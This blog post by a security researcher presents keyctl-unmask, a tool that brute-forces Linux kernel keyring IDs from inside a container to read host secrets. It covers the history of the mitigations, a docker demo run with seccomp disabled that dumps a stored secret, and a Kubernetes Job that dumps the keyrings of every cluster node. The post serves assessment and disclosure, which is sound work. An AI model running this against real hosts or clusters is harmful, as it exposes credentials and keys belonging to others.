Have you ever wanted to steal all the secrets from a Linux host from within a container? Sure we all have. Lets do it at scale and share a tool that speeds this up during security assessments.
Container security folks (David
Howells) have known
that the Keyctl syscall executed from within containers
is problematic because there is no inherent way to isolate the Linux Kernel’s
keyrings and keys which are designed to be used to store sensitive content. This
means that container runtimes have to bolt on defenses to try and prevent the
keys from being leaked into a container.
You may find it surising how often Linux Kernel Keyrings are. (At least I was.) For example Kerberos often uses this extensively, products from companies like Cyberark rely on the security of these keyrings, and even Systemd uses it.
The tool I’m sharing keyctl-unmask
will show you how to expose these keys even
from within a container.
The keyctl(2)
syscall is an API for users to interact with Linux kernel keyrings. These
keyrings are designed to store sensitive information per user, session, thread,
or process. Along with the syscall interface, there is a procfs mount on most
systems under /proc/keys
that provides a list of all the keys your accounts
has permission to view.
For containers, this was deemed a security risk (and you might agree) because you don’t want your containers to be able to access the private keys of the host or other containers.
One part of the original fix for this was to simply “mask” /proc/keys
so that cat /proc/keys
wouldn’t return any results.
Keyctl-unmask shows what happens when you allow any container the ability to issue keyctl syscalls.
I believe that the history of the containers trying to protect itself from syscalls goes like this:
/proc/keys
at all so any user could list the host’s keyskeyctl
syscallkeyctl
to the list of syscalls blocked by Docker’s default seccomp profile. This is successful and we should still use it today!/proc/keys
so that if you were to cat /proc/keys
you wouldn’t see any resultsstefanberger
starts an Epic Discussion that results in runc
creating a new session key per container. Cool! That sounds like a security move except it has no impact in reality:
“With the patch, each container gets its own session keyring. However, it does work better with user namespaces enabled than without it. With user namespaces each container has its own session keyring _ses and a ‘docker exec’ joins this session keyring. Without user namespaces enabled, each container also gets a session keyring on ‘docker run’ but a ‘docker exec’ again joins the first created session keyring so that containers share it. The advantage still is that it’s not a keyring shared with the host, even though in the case that user namespaces are not enabled, the containers end up sharing a session keyring upon ‘docker exec.'”
So as of today, your container runtime will likely create it’s own session
keyring per container and the /proc/keys
path will be masked. I’ll try to
explain why this doesn’t do much to secure the keyrings. But also note that
seccomp being enabled or user namespace being enabled successfully mitigates
this threat.
First, let me summarize how keyrings are protected on a host:
In short, the Keyctl API is smoke and mirrors. If you have root, in a container*, you can access any key on the host with some extra steps.
Next, let me show you how you can automate those extra steps:
This will demonstrate how you can brute force all the keys of a host and take over
every keyring. keyctl-unmask
does the following to unmask all the keys on the
host:
int32
to guess the keyring ID’sTo demo this, in one container (we’ll call secret-server), create a new key representing a secret stored by a container:
docker run --name secret-server -it --security-opt \
seccomp=unconfined antitree/keyctl-unmask /bin/bash
> keyctl add user antitrees_secret thetruthisiliketrees @s
911117332
> keyctl show
Session Keyring
899321446 --alswrv 0 0 keyring: _ses.95f119ce25274b852fc62369089dcb4fbe15678e62eecfdc685d292e6a01f852
911117332 --alswrv 0 0 \_ user: antitrees_secret
root@keyctl-attacker:/# keyctl-unmask -min 0 -max 999999999
10 / 10 [----------------------------------------------------------------------------] 100.00% ? p/s 0s
Output saved to: ./keyctl_ids
root@keyctl-attacker:/# cat keyctl_ids
{
"KeyId": 899321446,
"Valid": true,
"Name": "_ses.95f119ce25274b852fc62369089dcb4fbe15678e62eecfdc685d292e6a01f852",
"Type": "keyring",
"Uid": "0",
"Gid": "0",
"Perms": "3f1b0000",
"String_Content": "\u0014\ufffdN6",
"Byte_Content": "FIxONg==",
"Comments": null,
"Subkeys": [
{
"KeyId": 911117332,
"Valid": true,
"Name": "antitrees_secret",
"Type": "user",
"Uid": "0",
"Gid": "0",
"Perms": "3f010000",
"String_Content": "thetruthisiliketrees",
"Byte_Content": "dGhldHJ1dGhpc2lsaWtldHJlZXM=",
"Comments": null,
"Subkeys": null
}
]
What’s a container tool without an ability to run in Kubernetes. This shows how to use a Kubernetes Job to run this tool on every single Node in a cluster, mount a persistent volume claim, and dump all the keyrings for each node onto it. Then you can simple jump into the Pod and read the results:
keyctl apply -f https://github.com/antitree/keyctl-unmask/examples/k8s/keyctl-unmask-job.yaml
kubectl exec -it -n test keyctl-unmask-debug-pod -- /bin/bash
> cat /keyctl-output/$NODE_NAME
{
"KeyId": 899321446,
"Valid": true,
"Name": "_ses.95f119ce25274b852fc62369089dcb4fbe15678e62eecfdc685d292e6a01f852",
"Type": "keyring",
...
As I’ve noticed in my other long posts, there’s an inverse relationship between people that will @ me on Twitter and people that have read my entire post but I’ll try to explain the caveats clearly.
Here are some other projects that seem to be using keyctl syscalls (but don’t hate on them, IDK if they need to run in containers but I know they shouldn’t be):
azcopy
for Azure